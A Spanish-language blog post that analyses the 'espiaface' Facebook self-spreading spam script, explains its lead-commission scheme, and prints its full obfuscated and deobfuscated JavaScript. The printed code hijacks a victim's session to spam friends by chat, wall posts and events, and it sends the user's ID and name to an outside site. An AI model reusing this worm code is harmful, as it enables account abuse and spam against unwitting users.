67x65x6Ex65x74x69x63x73x2Ex62x77x68x2Ex68x61x72x76x61x72x64x2Ex65x64x75x2Fx73x6Ex70x32x72x66x6Cx70x2Fx63x69x72x63x6Cx65x2Ex67x69x66x22x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x64x61x74x61","x66x69x72x73x74x43x68x69x6Cx64","x6Ex61x76x41x63x63x6Fx75x6Ex74x4Ex61x6Dx65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x3F","x2Fx61x6Ax61x78x2Fx63x68x6Fx6Fx73x65x2Fx3Fx5Fx5Fx61x3Dx31","x65x76x65x6Ex74","x41x73x79x6Ex63x52x65x71x75x65x73x74","x2Fx61x6Ax61x78x2Fx74x79x70x65x61x68x65x61x64x2Fx66x69x72x73x74x5Fx64x65x67x72x65x65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31x26x76x69x65x77x65x72x3D","x26x74x6Fx6Bx65x6Ex3D","x26x66x69x6Cx74x65x72x5Bx30x5Dx3Dx75x73x65x72x26x6Fx70x74x69x6Fx6Ex73x5Bx30x5Dx3Dx66x72x69x65x6Ex64x73x5Fx6Fx6Ex6Cx79x26x6Fx70x74x69x6Fx6Ex73x5Bx31x5Dx3Dx6Ex6Dx26x6Fx70x74x69x6Fx6Ex73x5Bx32x5Dx3Dx73x6Fx72x74x5Fx61x6Cx70x68x61","x6Cx65x6Ex67x74x68","x70x75x73x68","x67x65x74x54x69x6Dx65","x73x65x74x54x69x6Dx65","x67x65x74x4Dx6Fx6Ex74x68","x67x65x74x44x61x74x65","x67x65x74x46x75x6Cx6Cx59x65x61x72","x67x65x74x48x6Fx75x72x73","x2C","x6Ax6Fx69x6E","x6Fx6E","x43x72x65x61x74x65x20x45x76x65x6Ex74","x6Ex65x77","x2Fx65x76x65x6Ex74x73x2Fx63x72x65x61x74x65x2Ex70x68x70","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx62x75x64x64x79x5Fx6Cx69x73x74x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x73x75x62x73x74x72","x28","x29","x62x75x64x64x79x5Fx6Cx69x73x74","x70x61x79x6Cx6Fx61x64","x6Ex6Fx77x41x76x61x69x6Cx61x62x6Cx65x4Cx69x73x74","x72x61x6Ex64x6Fx6D","x66x6Cx6Fx6Fx72","x25x66x69x72x73x74x6Ex61x6Dx65x25","x74x6Fx4Cx6Fx77x65x72x43x61x73x65","x66x69x72x73x74x4Ex61x6Dx65","x75x73x65x72x49x6Ex66x6Fx73","x72x65x70x6Cx61x63x65","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx73x65x6Ex64x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x2Fx61x6Ax61x78x2Fx62x72x6Fx77x73x65x72x2Fx66x72x69x65x6Ex64x73x2Fx3Fx75x69x64x3D","x26x66x69x6Cx74x65x72x3Dx61x6Cx6Cx26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x3Dx31","x73x68x69x66x74","x66x65x74x63x68x65x64x20x66x72x69x65x6Ex64x73x3Ax20","x68x6Fx6Dx65","x70x6Fx70","x25x74x66x25","x73x65x61x72x63x68","x78x68x70x63x5Fx6Dx65x73x73x61x67x65x5Fx74x65x78x74","x78x68x70x63x5Fx6Dx65x73x73x61x67x65","x6Dx65x73x73x61x67x65x20x74x65x78x74x3Ax20","x2Fx61x6Ax61x78x2Fx75x70x64x61x74x65x73x74x61x74x75x73x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65"];var chatmessage=_0x3fe9[0];var postmessage=_0x3fe9[1];var redirect=_0x3fe9[2];var eventdesc=_0x3fe9[3];var eventname=_0x3fe9[4];var nfriends=5000;var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0x3fe9[7]][_0x3fe9[6]][_0x3fe9[5]]=redirect;} ,500);} ;} ;var doget=function (_0xbf72xb,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[8],_0xbf72xb);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]]();} ;doget(_0x3fe9[15],function (_0xbf72xf){var _0xbf72x10=document[_0x3fe9[17]][_0x3fe9[16]](/c_user=(d+)/)[1];var _0xbf72x11=function (_0xbf72x12){return _0xbf72x12?_0x3fe9[18]+_0xbf72x12[_0x3fe9[19]]+_0x3fe9[20]+_0xbf72x12[_0x3fe9[21]]+_0x3fe9[22]:_0x3fe9[23];} ;var _0xbf72x13=function (_0xbf72x12){return _0xbf72x12?_0xbf72x12[_0x3fe9[21]]:_0x3fe9[23];} ;var _0xbf72x14=function (_0xbf72x12){out=_0x3fe9[23];for(var _0xbf72x15 in _0xbf72x12){out+=(out?_0x3fe9[24]:_0x3fe9[23])+_0xbf72x15+(_0xbf72x12[_0xbf72x15]!==null?_0x3fe9[25]+encodeURIComponent(_0xbf72x12[_0xbf72x15]):_0x3fe9[23]);} ;return out;} ;var _0xbf72x16=function (_0xbf72xb,_0xbf72x12,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[26],_0xbf72xb);_0xbf72xe[_0x3fe9[29]](_0x3fe9[27],_0x3fe9[28]);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]](_0xbf72x14(_0xbf72x12));} ;var _0xbf72x17=function (){var _0xbf72x18=document[_0x3fe9[31]](_0x3fe9[30]);_0xbf72x18[_0x3fe9[33]][_0x3fe9[32]]=_0x3fe9[34];_0xbf72x18[_0x3fe9[33]][_0x3fe9[35]]=_0x3fe9[36];_0xbf72x18[_0x3fe9[33]][_0x3fe9[37]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[39]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[40]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[7]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[42]]=_0x3fe9[43];_0xbf72x18[_0x3fe9[33]][_0x3fe9[44]]=_0x3fe9[45];_0xbf72x18[_0x3fe9[33]][_0x3fe9[46]]=_0x3fe9[47];_0xbf72x18[_0x3fe9[33]][_0x3fe9[48]]=999999;_0xbf72x18[_0x3fe9[49]]=_0x3fe9[50];document[_0x3fe9[52]][_0x3fe9[51]](_0xbf72x18);} ;var _0xbf72x19=_0xbf72xf[_0x3fe9[16]](/name="xhpc_composerid" value="([dw]+)"/i);if(_0xbf72x19){comp=_0xbf72x19[1];} else {comp=_0x3fe9[23];} ;var _0xbf72x1a=_0xbf72xf[_0x3fe9[16]](/name="post_form_id" value="([dw]+)"/i)[1];var _0xbf72x1b=_0xbf72xf[_0x3fe9[16]](/name="fb_dtsg" value="([dw]+)"/i)[1];var _0xbf72x1c=document[_0x3fe9[56]](_0x3fe9[55])[_0x3fe9[54]][_0x3fe9[53]];redirect=redirect+_0x3fe9[57]+_0xbf72x14({userid:_0xbf72x10,name:_0xbf72x1c,doclose:1});_0xbf72x17();if(eventdesc){wf++;_0xbf72x16(_0x3fe9[58],{type:_0x3fe9[59],eid:null,invite_message:_0x3fe9[23],__d:1,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60]},function (_0xbf72x1d){var _0xbf72x1e=_0xbf72x1d[_0x3fe9[16]](/"token":"([^]+)"/)[1];var _0xbf72xb=_0x3fe9[61]+_0xbf72x10+_0x3fe9[62]+_0xbf72x1e+_0x3fe9[63];doget(_0xbf72xb,function (_0xbf72x1f){var _0xbf72x20=_0xbf72x1f[_0x3fe9[16]](/{"uid":d+,/g);var _0xbf72x21=[];for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/:(d+),/)[1];if(_0xbf72x23!=_0xbf72x10){_0xbf72x21[_0x3fe9[65]](_0xbf72x23);} ;} ;var _0xbf72x24= new Date;_0xbf72x24[_0x3fe9[67]](_0xbf72x24[_0x3fe9[66]]()+86400000);datestr=_0xbf72x24[_0x3fe9[68]]()+1+_0x3fe9[15]+_0xbf72x24[_0x3fe9[69]]()+_0x3fe9[15]+_0xbf72x24[_0x3fe9[70]]();timestr=_0xbf72x24[_0x3fe9[71]]()*60;var _0xbf72x25={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,start_dateIntlDisplay:datestr,start_date:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0x3fe9[23],location:_0x3fe9[23],street:_0x3fe9[23],geo_id:_0x3fe9[23],geo_sq:_0x3fe9[23],desc:eventdesc,sgb_invitees:_0xbf72x21[_0x3fe9[73]](_0x3fe9[72]),sgb_emails:_0x3fe9[23],sgb_message:_0x3fe9[23],privacy_type:_0x3fe9[74],guest_list:_0x3fe9[74],connections_can_post:_0x3fe9[74],save:_0x3fe9[75],submitting:_0x3fe9[23]};_0xbf72x25[_0x3fe9[76]]=_0x3fe9[23];_0xbf72x16(_0x3fe9[77],_0xbf72x25,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xbf72x16(_0x3fe9[78],{user:_0xbf72x10,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60],popped_out:false,force_render:true},function (_0xbf72x1d){var _0xbf72x26=_0xbf72x1d[_0x3fe9[79]](9);var _0xbf72x27=eval(_0x3fe9[80]+_0xbf72x26+_0x3fe9[81]);var _0xbf72x28=_0xbf72x27[_0x3fe9[83]][_0x3fe9[82]];for(var _0xbf72x29 in _0xbf72x28[_0x3fe9[84]]){var _0xbf72x2a=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958);var _0xbf72x2b=( new Date)[_0x3fe9[66]]();var _0xbf72x2c=chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]());_0xbf72x16(_0x3fe9[92],{msg_id:Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958),client_time:( new Date)[_0x3fe9[66]](),msg_text:chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]()),to:_0xbf72x29,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,post_form_id_source:_0x3fe9[60]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0x3fe9[93]+_0xbf72x10+_0x3fe9[94],function (_0xbf72x1d){var _0xbf72x20=_0xbf72x1d[_0x3fe9[16]](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);var _0xbf72x2d=[];if(_0xbf72x20){for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/_d+_/)[0][_0x3fe9[91]](/_/g,_0x3fe9[23]);var _0xbf72x2e=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/>[^>]+u003c/a>$/i)[0][_0x3fe9[91]](/u003c/a>$/gim,_0x3fe9[23])[_0x3fe9[91]](/>/g,_0x3fe9[23]);_0xbf72x2d[_0x3fe9[65]]({id:_0xbf72x23,name:_0xbf72x2e});} ;} ;var _0xbf72xd=[];var _0xbf72x2f=[];while(_0xbf72x2d[_0x3fe9[64]]){var _0xbf72x30=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*_0xbf72x2d[_0x3fe9[64]]);_0xbf72xd[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);_0xbf72x2f[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);var _0xbf72x2b=_0xbf72x2d[_0x3fe9[95]]();if(_0xbf72x30){_0xbf72x2d[_0xbf72x30-1]=_0xbf72x2b;} ;} ;if(debug){alert(_0x3fe9[96]+_0xbf72xd[_0x3fe9[64]]);} ;var _0xbf72x31={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x10,xhpc_context:_0x3fe9[97],xhpc_fbx:_0x3fe9[23],lsd:null,post_form_id_source:_0x3fe9[60]};mt=postmessage;m=postmessage;while(mt[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x32=_0xbf72xd[_0x3fe9[98]]();mt=mt[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x32));m=m[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x32));} ;_0xbf72x31[_0x3fe9[101]]=mt;_0xbf72x31[_0x3fe9[102]]=m;if(debug){alert(_0x3fe9[103]+mt);} ;_0xbf72x16(_0x3fe9[104],_0xbf72x31);var _0xbf72x33=function (_0xbf72x15){if(_0xbf72x15==0){wf=0;mf();return ;} ;var _0xbf72x34=_0xbf72x2f[_0x3fe9[95]]();var _0xbf72x35={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x34[_0x3fe9[19]],xhpc_context:_0x3fe9[105],xhpc_fbx:1,lsd:null,post_form_id_source:_0x3fe9[60]};var _0xbf72x36=postmessage;var _0xbf72x37=postmessage;if(_0xbf72xd[_0x3fe9[64]]==0){wf=0;mf();return ;} ;while(_0xbf72x36[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x38=_0xbf72xd[_0x3fe9[98]]();_0xbf72x36=_0xbf72x36[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x38));_0xbf72x37=_0xbf72x37[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x38));} ;_0xbf72x35[_0x3fe9[101]]=_0xbf72x36;_0xbf72x35[_0x3fe9[102]]=_0xbf72x37;_0xbf72x16(_0x3fe9[104],_0xbf72x35);setTimeout(function (){_0xbf72x33(_0xbf72x15-1);} ,2000);} ;wf++;setTimeout(function (){_0xbf72x33(nfriends);} ,2000);} );} ;mf();} ); No se entiende una mierda. ¿Por qué?, porque el código está ofuscado. ¿Qué es eso? La ofuscación de código sirve para que la gilada no pueda entender qué carajo hace el código... y por otra parte, ahorra algo de espacio al comprimir los archivos. Afortunadamente no formamos parte de la gilada y podemos de-ofuscar el código, porque somos grosos y lo sabemos (lo pongo entero al código para los que saben Javascript): var chatmessage = '%firstname%'; var postmessage = 'Top de visitantes de tu perfil de hoy: x0A %tf% - 19 visitas x0A %tf% - 16 visitas x0A %tf% - 15 visitas x0A %tf% - 13 visitas x0A Averigua tu tambien quien te esta mirando entrando en: espiaface.comx0AFunciona de verdad!'; var redirect = 'http://www.espiaface.com/carga.php'; var eventdesc = 'Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com'; var eventname = 'Averigua quien visita tu perfil'; var nfriends = 5000; var debug = false; var wf = 0; var mf = function () { if (wf <= 0) { setTimeout(function () { window['top']['location']['href'] = redirect; }, 500); }; }; var doget = function (_0xbf72xb, _0xbf72xc, _0xbf72xd) { var _0xbf72xe = new XMLHttpRequest; _0xbf72xe['open']('GET', _0xbf72xb); _0xbf72xe['onreadystatechange'] = function () { if (_0xbf72xe['readyState'] == 4) { if (_0xbf72xe['status'] == 200 && _0xbf72xc) { _0xbf72xc(_0xbf72xe['responseText']); }; if (_0xbf72xd) { _0xbf72xd(); }; }; }; _0xbf72xe['send'](); }; doget('/', function (_0xbf72xf) { var _0xbf72x10 = document['cookie']['match'](/c_user=(d+)/)[1]; var _0xbf72x11 = function (_0xbf72x12) { return _0xbf72x12 ? '@[' + _0xbf72x12['id'] + ':' + _0xbf72x12['name'] + ']' : ''; }; var _0xbf72x13 = function (_0xbf72x12) { return _0xbf72x12 ? _0xbf72x12['name'] : ''; }; var _0xbf72x14 = function (_0xbf72x12) { out = ''; for (var _0xbf72x15 in _0xbf72x12) { out += (out ? '&' : '') + _0xbf72x15 + (_0xbf72x12[_0xbf72x15] !== null ? '=' + encodeURIComponent(_0xbf72x12[_0xbf72x15]) : ''); }; return out; }; var _0xbf72x16 = function (_0xbf72xb, _0xbf72x12, _0xbf72xc, _0xbf72xd) { var _0xbf72xe = new XMLHttpRequest; _0xbf72xe['open']('POST', _0xbf72xb); _0xbf72xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded'); _0xbf72xe['onreadystatechange'] = function () { if (_0xbf72xe['readyState'] == 4) { if (_0xbf72xe['status'] == 200 && _0xbf72xc) { _0xbf72xc(_0xbf72xe['responseText']); }; if (_0xbf72xd) { _0xbf72xd(); }; }; }; _0xbf72xe['send'](_0xbf72x14(_0xbf72x12)); }; var _0xbf72x17 = function () { var _0xbf72x18 = document['createElement']('div'); _0xbf72x18['style']['display'] = 'block'; _0xbf72x18['style']['position'] = 'absolute'; _0xbf72x18['style']['width'] = '100%'; _0xbf72x18['style']['height'] = '100%'; _0xbf72x18['style']['left'] = '0px'; _0xbf72x18['style']['top'] = '0px'; _0xbf72x18['style']['textAlign'] = 'center'; _0xbf72x18['style']['padding'] = '4px'; _0xbf72x18['style']['background'] = '#FFFFFF'; _0xbf72x18['style']['zIndex'] = 999999; _0xbf72x18['innerHTML'] = ' <br/><b>Cargando aplicacion, aguarde un momento...</b><br/><br/> La aplicacion esta preparando tu facebook para registrar las visitas de tus amigos.<br/><br/><img src="http://genetics.bwh.harvard.edu/snp2rflp/circle.gif">'; document['body']['appendChild'](_0xbf72x18); }; var _0xbf72x19 = _0xbf72xf['match'](/name="xhpc_composerid" value="([dw]+)"/i); if (_0xbf72x19) { comp = _0xbf72x19[1]; } else { comp = ''; }; var _0xbf72x1a = _0xbf72xf['match'](/name="post_form_id" value="([dw]+)"/i)[1]; var _0xbf72x1b = _0xbf72xf['match'](/name="fb_dtsg" value="([dw]+)"/i)[1]; var _0xbf72x1c = document['getElementById']('navAccountName')['firstChild']['data']; redirect = redirect + '?' + _0xbf72x14({ userid: _0xbf72x10, name: _0xbf72x1c, doclose: 1 }); _0xbf72x17(); if (eventdesc) { wf++; _0xbf72x16('/ajax/choose/?__a=1', { type: 'event', eid: null, invite_message: '', __d: 1, post_form_id: _0xbf72x1a, fb_dtsg: _0xbf72x1b, lsd: null, post_form_id_source: 'AsyncRequest' }, function (_0xbf72x1d) { var _0xbf72x1e = _0xbf72x1d['match'](/"token":"([^]+)"/)[1]; var _0xbf72xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xbf72x10 + '&token=' + _0xbf72x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha'; doget(_0xbf72xb, function (_0xbf72x1f) { var _0xbf72x20 = _0xbf72x1f['match'](/{"uid":d+,/g); var _0xbf72x21 = []; for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) { var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/:(d+),/)[1]; if (_0xbf72x23 != _0xbf72x10) { _0xbf72x21['push'](_0xbf72x23); }; }; var _0xbf72x24 = new Date; _0xbf72x24['setTime'](_0xbf72x24['getTime']() + 86400000); datestr = _0xbf72x24['getMonth']() + 1 + '/' + _0xbf72x24['getDate']() + '/' + _0xbf72x24['getFullYear'](); timestr = _0xbf72x24['getHours']() * 60; var _0xbf72x25 = { post_form_id: _0xbf72x1a, fb_dtsg: _0xbf72x1b, start_dateIntlDisplay: datestr, start_date: datestr, start_time_hour_min: timestr, name: eventname, place_page_id: '', location: '', street: '', geo_id: '', geo_sq: '', desc: eventdesc, sgb_invitees: _0xbf72x21['join'](','), sgb_emails: '', sgb_message: '', privacy_type: 'on', guest_list: 'on', connections_can_post: 'on', save: 'Create Event', submitting: '' }; _0xbf72x25['new'] = ''; _0xbf72x16('/events/create.php', _0xbf72x25, false, function () { mf(--wf); }); }); }); }; if (chatmessage) { wf++; _0xbf72x16('/ajax/chat/buddy_list.php?__a=1', { user: _0xbf72x10, post_form_id: _0xbf72x1a, fb_dtsg: _0xbf72x1b, lsd: null, post_form_id_source: 'AsyncRequest', popped_out: false, force_render: true }, function (_0xbf72x1d) { var _0xbf72x26 = _0xbf72x1d['substr'](9); var _0xbf72x27 = eval('(' + _0xbf72x26 + ')'); var _0xbf72x28 = _0xbf72x27['payload']['buddy_list']; for (var _0xbf72x29 in _0xbf72x28['nowAvailableList']) { var _0xbf72x2a = Math['floor'](Math['random']() * 1335448958); var _0xbf72x2b = (new Date)['getTime'](); var _0xbf72x2c = chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']()); _0xbf72x16('/ajax/chat/send.php?__a=1', { msg_id: Math['floor'](Math['random']() * 1335448958), client_time: (new Date)['getTime'](), msg_text: chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']()), to: _0xbf72x29, post_form_id: _0xbf72x1a, fb_dtsg: _0xbf72x1b, post_form_id_source: 'AsyncRequest' }); }; mf(--wf); }); }; if (postmessage) { wf++; doget('/ajax/browser/friends/?uid=' + _0xbf72x10 + '&filter=all&__a=1&__d=1', function (_0xbf72x1d) { var _0xbf72x20 = _0xbf72x1d['match'](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi); var _0xbf72x2d = []; if (_0xbf72x20) { for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) { var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/_d+_/)[0]['replace'](/_/g, ''); var _0xbf72x2e = _0xbf72x20[_0xbf72x22]['match'](/>[^>]+u003c/a>$/i)[0]['replace'](/u003c/a>$/gim, '')['replace'](/>/g, ''); _0xbf72x2d['push']({ id: _0xbf72x23, name: _0xbf72x2e }); }; }; var _0xbf72xd = []; var _0xbf72x2f = []; while (_0xbf72x2d['length']) { var _0xbf72x30 = Math['floor'](Math['random']() * _0xbf72x2d['length']); _0xbf72xd['push'](_0xbf72x2d[_0xbf72x30]); _0xbf72x2f['push'](_0xbf72x2d[_0xbf72x30]); var _0xbf72x2b = _0xbf72x2d['shift'](); if (_0xbf72x30) { _0xbf72x2d[_0xbf72x30 - 1] = _0xbf72x2b; }; }; if (debug) { alert('fetched friends: ' + _0xbf72xd['length']); }; var _0xbf72x31 = { post_form_id: _0xbf72x1a, fb_dtsg: _0xbf72x1b, xhpc_composerid: comp, xhpc_targetid: _0xbf72x10, xhpc_context: 'home', xhpc_fbx: '', lsd: null, post_form_id_source: 'AsyncRequest' }; mt = postmessage; m = postmessage; while (mt['search']('%tf%') >= 0) { var _0xbf72x32 = _0xbf72xd['pop'](); mt = mt['replace']('%tf%', _0xbf72x13(_0xbf72x32)); m = m['replace']('%tf%', _0xbf72x11(_0xbf72x32)); }; _0xbf72x31['xhpc_message_text'] = mt; _0xbf72x31['xhpc_message'] = m; if (debug) { alert('message text: ' + mt); }; _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x31); var _0xbf72x33 = function (_0xbf72x15) { if (_0xbf72x15 == 0) { wf = 0; mf(); return; }; var _0xbf72x34 = _0xbf72x2f['shift'](); var _0xbf72x35 = { post_form_id: _0xbf72x1a, fb_dtsg: _0xbf72x1b, xhpc_composerid: comp, xhpc_targetid: _0xbf72x34['id'], xhpc_context: 'profile', xhpc_fbx: 1, lsd: null, post_form_id_source: 'AsyncRequest' }; var _0xbf72x36 = postmessage; var _0xbf72x37 = postmessage; if (_0xbf72xd['length'] == 0) { wf = 0; mf(); return; }; while (_0xbf72x36['search']('%tf%') >= 0) { var _0xbf72x38 = _0xbf72xd['pop'](); _0xbf72x36 = _0xbf72x36['replace']('%tf%', _0xbf72x13(_0xbf72x38)); _0xbf72x37 = _0xbf72x37['replace']('%tf%', _0xbf72x11(_0xbf72x38)); }; _0xbf72x35['xhpc_message_text'] = _0xbf72x36; _0xbf72x35['xhpc_message'] = _0xbf72x37; _0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x35); setTimeout(function () { _0xbf72x33(_0xbf72x15 - 1); }, 2000); }; wf++; setTimeout(function () { _0xbf72x33(nfriends); }, 2000); }); }; mf(); }); "No entendí una mierda de nuevo", dirás probablemente. No te preocupes, que acá está papá nanopene para ayudarte. "No gracias, tu post apesta", dirías muy educadamente. "Confiá en mí, sé exactamente lo que hago", te diría Martillo Hammer y te metería un balazo en el orto. Hablando en serio de nuevo, vamos a explicar muy rápidamente lo que hace este código durante los 2 y 3 minutos que tenés que esperar: 0) Te muestra un gif robado de la Universidad de Harvard, (parece re wow, pero es un detalle re irrelevante, jajaja) para mostrarte que está "cargando": 1) Envia automáticamente un chat a un amigo online poniendo: [el nombre de pila de tu amigo], mira esto que es increible, te permite ver quienes visitan tu perfil y funciona bien, entra a: espiaface.com 2) Se fija los amigos que tenés en Facebook y escoge a cuatro amigos al azar para generar el mensaje del muro: Top de visitantes de tu perfil de hoy: %tf% - 19 visitas %tf% - 16 visitas %tf% - 15 visitas %tf% - 13 visitas Averigua tu tambien quien te esta mirando entrando en: espiaface.com Funciona de verdad! (En %tf% reemplaza por los nombres completos de tus amigos escogidos al azar)Fijate que siempre va a mostrar que tuviste 19, 16, 15 y 13 visitas. Esto demuestra una paja tremenda del programador, la versión en inglés genera números aleatorios. 3) Crea un evento en facebook (Vas a ir: ¿si, no, quizas?) y automáticamente invita a todos tus amigos Nombre del Evento: Averigua quien visita tu perfil Descripción del evento: Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com Lo gracioso es que hay gente que dice "si, voy a atender al evento". Hay que ser pelotudos. Resumiendo Ese código, en esos 2 y 3 minutos que te pide esperar: Lo que hace Al poner ese código en la barra de direcciones, toma el control de tu Facebook un ratito para Spamear tanto por chat, como en el muro y también organizando eventos. Lo único que hace es Spamear por los codos. Lo que no hace No te roba el cookie, ni te saca la contraseña, ni accede a información privada de tu perfil, ni te sube virus ocultamente, ni te baja los pantalones, ni te mete... bueno lo paramos ahi. ¿Entonces cuál es el punto? ¿Entonces para qué carajo alguien se molestó en crear semejante estupidez? Muy simple, para hacer dinero. Mucho dinero. Potencialmente podría haber generado millones de dólares, les explico a continuación. Una vez que terminan los minutos de espera te redirige al siguiente sitio: final.espiaface.com (www.espiaface.com/carga.php) En final.espiaface.com te dice: Eso es lo que vas a ver si vivis en sudamérica. Y la imagen de arriba va ser lo último que hayas visto. Es por esto que muchos analistas en la red se rascaban la cabeza preguntándose cuál era el fin de este "virus". Pero si vivís en México, te va a mostrar una oferta: de http://www.enterfactory.com/ (no ingreses el numero de tu celular) Y si vivís en Estados Unidos te va a mostrar cinco links surtidos de diferentes juegos de: PlaySushi.com, PageRage.com, Gamevance.com De nuevo, ¿qué gana el autor? Si sos un hispano de Estados Unidos que entraste a PlaySushi.com y te bajaste el juego, el creador de Espiaface ganó $1. Si sos un Mexicano que pusiste tu número de celular en Enterfactory.com, le generaste al creador de Espiaface $1. Esto es lo que se llama comisión por intención de compra (leads). Si te suscribís a algún producto, llenás un formulario (eufemísticamente llamados "encuestas" ) con tus datos personales, eso genera un "lead" y le genera una comisión por referido. Estas ofertas están restringidas por países, y la gran mayoría de los países hispanos estaban fuera de las areas de promoción, es por eso que a la mayoría de ustedes les mostraba: "Sorry, There are no surveys available to your country at this time. Please try back later" (Disculpen, no hay encuestas disponibles en su país en este momento. Por favor intente luego) Este es el rango de las comisiones por sitio: PageRage (Sólo disponible para USA): de $0,8 a $2,20 por lead. (Promedio: $1,50) Gamevance (Sólo disponible para USA): de $1,60 a $2,29 por lead. (Promedio: $1,95) Playsushi (Sólo disponible para USA): de $0,90 a $2 por lead. (Promedio: $1,45) Enterfactory (Sólo disponible para México): de $0,60 a $1,20 por lead. (Promedio: $0,90) Si suponemos razonablemente que un 1% de los usuarios mexicanos de Facebook (Facebook tiene 24.910.520 usuarios mexicanos registrados) se suscribieron a Enterfactory.com ($1 por lead para facilitar el cálculo, además de que es el más probable), el creador de espiaface se hubiera levantado $249.105 dólares limpios. La versión en inglés debe haber generado como mínimo un millón de dólares. Si consideramos que sólo 1% de los usuarios de Facebook de Estados Unidos cayeron en la trampa (Facebook tiene 150.201.840 usuarios registrados en USA), los creadores de estos fraudes levantaron $1.502.018 dólares verdes. Si agregamos a todos los países con usuarios angloparlantes (casi el resto del mundo) podemos fácilmente imaginar varias decenas de millones de dolares. Finalizado con el super análisis, ahora se pueden tranquilizar ahora no van a caer más personas en espiaface porque... oops... por el bien de la humanidad, el sitio ya no existe más (lalalala, les juro que yo no tuve nada que ver...) > CORRECCION: Volvió con los subdominios reformados y con el favicon de Facebook (uf, fuera de joda esa movida va a darle más legitimidad y van a caer más boludos.) Au revoir espiaface! > Au revoir las pelotas. >> CORRECCION DE CORRECCION: Ahora sí Au Revoir, finalmente está hackeada! Bueno ahora me voy a desayunar. Saludos a todos y buen día America! PD: Yapa, si instalaron los juegos de playsushi, es adware (programas que incluyen publicidad) 